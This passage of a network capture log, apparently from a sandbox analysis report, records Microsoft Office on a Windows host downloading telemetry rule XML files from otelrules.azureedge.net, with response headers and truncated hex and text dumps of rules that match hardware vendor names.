                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                            x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200508Z-1777c6cb754xlpjshC1TEBv8cc0000000a2g00000000ybk0
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:08 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            35192.168.2.44982913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:08 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:08 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                            x-ms-request-id: 302bdaed-601e-003e-338c-3a3248000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200508Z-1777c6cb754j8gqphC1TEB5bf800000009vg00000000xefe
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:08 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            36192.168.2.44983113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:09 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:10 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                            x-ms-request-id: a56dfe0e-901e-0029-2976-3b274a000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200510Z-1777c6cb754mqztshC1TEB4mkc0000000a50000000007m3n
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            37192.168.2.44983213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:10 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:10 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                            x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200510Z-185f5d8b95cdtclvhC1NYC4rmc0000000axg000000004xzb
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:10 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            38192.168.2.44983313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:10 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:10 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                            x-ms-request-id: 1b8ab84b-001e-0082-570c-3b5880000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200510Z-r1d97b99577mrt4rhC1TEBftkc000000095g00000000k2kw
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:10 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            39192.168.2.44983513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:10 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:10 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                            x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200510Z-178bfbc474bkvpdnhC1NYCuu2w00000000cg0000000032nq
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:10 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            40192.168.2.44983613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:12 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:12 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                            x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200512Z-185f5d8b95csd4bwhC1NYCq7dc0000000an000000000pbw0
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:12 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            41192.168.2.44983413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:12 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:12 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                            x-ms-request-id: 20c6f849-701e-005c-2e61-3bbb94000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200512Z-178bfbc474bbbqrhhC1NYCvw7400000000g000000000k94s
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:12 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            42192.168.2.44983713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:12 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:12 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                            x-ms-request-id: 7f65af6f-801e-0067-5f8c-3afe30000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200512Z-1777c6cb754whff4hC1TEBcd6c00000008qg00000000ehh3
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            43192.168.2.44983813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:12 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:12 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                            x-ms-request-id: f65efca2-801e-0035-4104-3b752a000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200512Z-r1d97b9957744xz5hC1TEB5bf8000000098g00000000719n
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:12 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            44192.168.2.44983913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
